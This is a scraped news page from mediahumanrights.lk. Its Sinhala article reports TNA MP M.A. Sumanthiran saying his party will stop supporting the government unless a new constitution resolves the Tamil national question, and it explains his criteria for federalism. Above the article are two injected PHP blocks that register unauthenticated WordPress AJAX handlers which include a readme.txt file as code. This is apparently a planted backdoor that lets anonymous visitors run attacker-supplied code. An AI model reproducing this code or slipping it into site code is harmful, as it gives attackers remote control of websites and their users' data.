if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ගැටළු වලට විසඳුම් නොලැබෙනවානම් ආණ්ඩුවට සහය දෙන්නේ නෑ - mediahumanrights.lk
mediahumanrights.lk
News Political

ගැටළු වලට විසඳුම් නොලැබෙනවානම් ආණ්ඩුවට සහය දෙන්නේ නෑ

දෙමළ ජාතික සන්ධානයට හා දෙමළ ජනතාවට ඇති ප‍්‍රධානම ගැටළුව වන ජාතික ගැටළුව විසඳාගැනීමට නව ව්‍යවස්ථාවෙන් අවස්ථාවක් නොලැබෙන්නේ නම් ආණ්ඩුවට සහයෝගය ලබානොදෙන බව දෙමළ ජාතික සන්ධාන පාර්ලිමේන්තු මන්ත‍්‍රී එම්.ඒ.සුමන්තිරන් මහතා පවසයි.
යාපනය ප‍්‍රදේශයේ පැවැත්වු මාධ්‍ය සාකච්ජාවකට එක්වෙමින් සුමන්තිරන් මහතා එලෙස පැවසුවේය.
වැඩිදුරටත් අදහස් දැක්වු සුමන්තිරන් මහතා ,
දෙමළ ජනතාවගේ ප‍්‍රධාන ඉල්ලීම ජතික ගැටළුව විසඳාගැනීමයි.එය ඉටු කර ගැනීමට නම් අපි ව්‍යවස්ථාව වෙනස් කළ යුතුයි. නව ව්‍යවස්ථාවක් ගෙන ඒමට තමයි මෙම පක්ෂ දෙක එකතුවෙලා ජාතික ආණ්ඩුවක් බිහි කළේ.ජාතික ආණ්ඩුවට දෙමළ ජාතික සන්ධානය සහයෝගය ලබාදෙන්නේ නව ව්‍යවස්ථාවක් සෑදීමටයි.
ජාතික ගැටළුවට විසදුමක් ලබා ගැනීමට නව ආණ්ඩුවක් බිහි කරලා එය පරාජයට පත් කිරීමට කටයුතු කිරීම මෝඩ කමක්. ඒ අනුව තමයි අපි මේ රජයට සහයෝගය ලබා දෙන්නේ. මේ රජය ඉදිරියට ගෙනියන්න  ඕනේ. එලෙස ඉදිරියට ගියොත් තමයි අපේ ඉලක්කයට යාමට අපට හැකියාක් ලැබෙන්නේ.
අපේ ජනතාවට තිබෙන ගැටළුවට විසදුමක් ලැබෙන්නේ නැත්නම් අපි මේ රජයට සහාය ලබාදෙන්නේ නෑ. නමුත් තවම එවැනි තත්ත්වයක් උදාවෙලා නෑ.
ෆෙඩරල් ක‍්‍රමයේ කරුණු දෙකක් තිබෙනවා.එකක් තමයි පළාතකට කිසියම් බලයක් ලබාදුන්නොත් එයට මධ්‍යම රජය සිය බලය පාවිච්චි කර පාලනය නොකළ යුතුයි. අනෙක් එක තමයි ලබාදුන් බලය පළාතේ නියෝජිතයින්ගේ අනුමැතිය නොමැතිව නැවත ලබාගත නොහැකියි.මේ දෙකම තිබෙනවා නම් එය ෆෙඩරල්. අතුරු වාර්තාවේ ෆෙඩරල් යන වචනය නොමැතිවුවත් මෙම කරුණු දෙක තිබෙනවා නම් එය ප‍්‍රමාණවත්.මෙම කරුණු දෙක අතුරු වාර්තාවේ ස`දහන් වෙලා තිබෙනවා. අදාළ කාරණයන් සම්බන්ධයෙන් නව ව්‍යවස්ථාව සැකසීම පිළිබඳ කමිටුවේ සිටින අපි දැඩි අවධානයක් යොමු කරලා තිබෙනවා.
(under the courtesy of adaderana news web)

Related posts

අහඹු පරීක්ෂාවකදී බම්බලපිටියේ ආසාදිතයන් 17ක් සොයාගෙන

Shiran Viraj

ජනබල විරෝධයට එමින් සිටි බස්වලට ගල් ගසති… අංක තහඩු නැති වාහන කරලියේ..

Shiran Viraj

මෛත්‍රී ගේ උපන්දිනය අද … රනිල් එක්ක නුවරඑළි ගිහින්

Shiran Viraj